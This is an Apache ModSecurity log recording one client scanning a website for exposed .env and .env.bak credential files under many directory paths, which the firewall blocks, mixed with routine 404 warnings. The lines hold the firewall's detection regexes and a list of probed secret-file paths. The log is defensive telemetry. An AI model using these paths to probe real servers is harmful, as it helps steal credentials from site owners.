[Tue May 26 14:50:05.475054 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0oQAAAO4"]
[Tue May 26 14:50:05.500181 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0pAAAAM8"]
[Tue May 26 14:50:05.556521 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0sAAAAJ0"]
[Tue May 26 14:50:05.594089 2026] [security2:error] [pid 648203:tid 648444] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0swAAAPQ"]
[Tue May 26 14:50:05.596829 2026] [security2:error] [pid 648203:tid 648355] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0fQAAAJs"]
[Tue May 26 14:50:05.614580 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0tgAAAKM"]
[Tue May 26 14:50:05.648265 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0uQAAANk"]
[Tue May 26 14:50:05.669988 2026] [security2:error] [pid 648203:tid 648396] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0vAAAAMQ"]
[Tue May 26 14:50:05.725297 2026] [security2:error] [pid 648203:tid 648382] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0wgAAALY"]
[Tue May 26 14:50:05.759329 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0xQAAALw"]
[Tue May 26 14:50:05.771557 2026] [security2:error] [pid 648203:tid 648448] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0yAAAAPg"]
[Tue May 26 14:50:05.878150 2026] [security2:error] [pid 648203:tid 648424] [client 45.148.10.95:31966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/server/.env"] [unique_id "ahVlxbEQDDtxJNiDrdT0zAAAAOA"]
[Tue May 26 14:50:05.891376 2026] [security2:error] [pid 648203:tid 648458] [client 45.148.10.95:31998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/server/api/.env"] [unique_id "ahVlxbEQDDtxJNiDrdT0zQAAAQI"]
[Tue May 26 14:50:05.911320 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0ywAAANA"]
[Tue May 26 14:50:05.930561 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:31870] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/s3/.env.bak"] [unique_id "ahVlxbEQDDtxJNiDrdT00gAAANs"]
[Tue May 26 14:50:05.965102 2026] [security2:error] [pid 648203:tid 648338] [client 45.148.10.95:31888] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/server/backend/.env"] [unique_id "ahVlxbEQDDtxJNiDrdT01gAAAIo"]
[Tue May 26 14:50:06.074879 2026] [security2:error] [pid 648203:tid 648348] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT02gAAAJQ"]
[Tue May 26 14:50:06.087071 2026] [security2:error] [pid 648203:tid 648354] [client 45.148.10.95:32056] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT02wAAAJo"]
[Tue May 26 14:50:06.099142 2026] [security2:error] [pid 648203:tid 648335] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0vwAAAIc"]
[Tue May 26 14:50:06.102395 2026] [security2:error] [pid 648203:tid 648420] [client 45.148.10.95:31998] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT03AAAANw"]
[Tue May 26 14:50:06.126692 2026] [security2:error] [pid 648203:tid 648392] [client 45.148.10.95:31832] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT03QAAAMA"]
[Tue May 26 14:50:06.128583 2026] [security2:error] [pid 648203:tid 648413] [client 45.148.10.95:32038] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT03gAAANU"]
[Tue May 26 14:50:06.144385 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT04gAAAPs"]
[Tue May 26 14:50:06.144611 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:31870] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT03wAAAMU"]
[Tue May 26 14:50:06.165289 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:32040] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT04wAAAKk"]
[Tue May 26 14:50:06.233590 2026] [security2:error] [pid 648203:tid 648439] [client 45.148.10.95:31888] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT06QAAAO8"]
[Tue May 26 14:50:06.236451 2026] [security2:error] [pid 648203:tid 648446] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT06gAAAPY"]
[Tue May 26 14:50:06.250196 2026] [security2:error] [pid 648203:tid 648345] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT07AAAAJE"]
[Tue May 26 14:50:06.272832 2026] [security2:error] [pid 648203:tid 648355] [client 45.148.10.95:31832] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/service/.env"] [unique_id "ahVlxrEQDDtxJNiDrdT09QAAAJs"]
[Tue May 26 14:50:06.282304 2026] [security2:error] [pid 648203:tid 648371] [client 45.148.10.95:31966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/services/.env"] [unique_id "ahVlxrEQDDtxJNiDrdT09wAAAKs"]
[Tue May 26 14:50:06.297200 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT08AAAAOk"]
[Tue May 26 14:50:06.298074 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT08gAAAKY"]
[Tue May 26 14:50:06.331162 2026] [security2:error] [pid 648203:tid 648395] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT09gAAAMM"]
[Tue May 26 14:50:06.397369 2026] [security2:error] [pid 648203:tid 648339] [client 45.148.10.95:32034] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT0-gAAAIs"]
[Tue May 26 14:50:06.431402 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:32040] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT0_QAAAN4"]
[Tue May 26 14:50:06.447547 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:32056] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/shop/.env"] [unique_id "ahVlxrEQDDtxJNiDrdT1BwAAAK0"]
[Tue May 26 14:50:06.448505 2026] [security2:error] [pid 648203:tid 648411] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1AAAAANM"]
[Tue May 26 14:50:06.462908 2026] [security2:error] [pid 648203:tid 648423] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1AwAAAN8"]
[Tue May 26 14:50:06.487445 2026] [security2:error] [pid 648203:tid 648376] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1BgAAALA"]
[Tue May 26 14:50:06.555927 2026] [security2:error] [pid 648203:tid 648406] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1EAAAAM4"]
[Tue May 26 14:50:06.583160 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1FQAAAPA"]
[Tue May 26 14:50:06.618138 2026] [security2:error] [pid 648203:tid 648424] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1GQAAAOA"]
[Tue May 26 14:50:06.619505 2026] [security2:error] [pid 648203:tid 648404] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1HAAAAMw"]
[Tue May 26 14:50:06.647358 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1HwAAANs"]
[Tue May 26 14:50:06.745419 2026] [security2:error] [pid 648203:tid 648413] [client 45.148.10.95:31966] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1KgAAANU"]
[Tue May 26 14:50:06.755634 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1KwAAAPs"]
[Tue May 26 14:50:06.826925 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:17002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1LAAAAM8"]
[Tue May 26 14:50:06.835898 2026] [security2:error] [pid 648203:tid 648350] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1LwAAAJY"]
[Tue May 26 14:50:06.839593 2026] [security2:error] [pid 648203:tid 648345] [client 45.148.10.95:32062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/src/.env"] [unique_id "ahVlxrEQDDtxJNiDrdT1NAAAAJE"]
[Tue May 26 14:50:06.871995 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:32056] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1MAAAAKk"]
[Tue May 26 14:50:06.873313 2026] [security2:error] [pid 648203:tid 648439] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1MwAAAO8"]
[Tue May 26 14:50:06.904118 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:32040] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/shared/.env"] [unique_id "ahVlxrEQDDtxJNiDrdT1NwAAAOk"]
[Tue May 26 14:50:06.949522 2026] [security2:error] [pid 648203:tid 648399] [client 45.148.10.95:32034] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1NQAAAMc"]
[Tue May 26 14:50:06.963840 2026] [security2:error] [pid 648203:tid 648436] [client 45.148.10.95:31966] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1NgAAAOw"]
[Tue May 26 14:50:06.972729 2026] [security2:error] [pid 648203:tid 648334] [client 45.148.10.95:17002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/srv/.env"] [unique_id "ahVlxrEQDDtxJNiDrdT1PAAAAIY"]
[Tue May 26 14:50:06.988768 2026] [security2:error] [pid 648203:tid 648372] [client 45.148.10.95:31870] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/stage/.env"] [unique_id "ahVlxrEQDDtxJNiDrdT1PQAAAKw"]
[Tue May 26 14:50:07.022570 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:31998] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1OwAAAKM"]
[Tue May 26 14:50:07.025257 2026] [security2:error] [pid 648203:tid 648393] [client 45.148.10.95:32084] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/staging/.env"] [unique_id "ahVlx7EQDDtxJNiDrdT1PgAAAME"]
[Tue May 26 14:50:07.181805 2026] [security2:error] [pid 648203:tid 648377] [client 45.148.10.95:17002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1QwAAALE"]
[Tue May 26 14:50:07.189373 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:32148] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1RgAAAN4"]
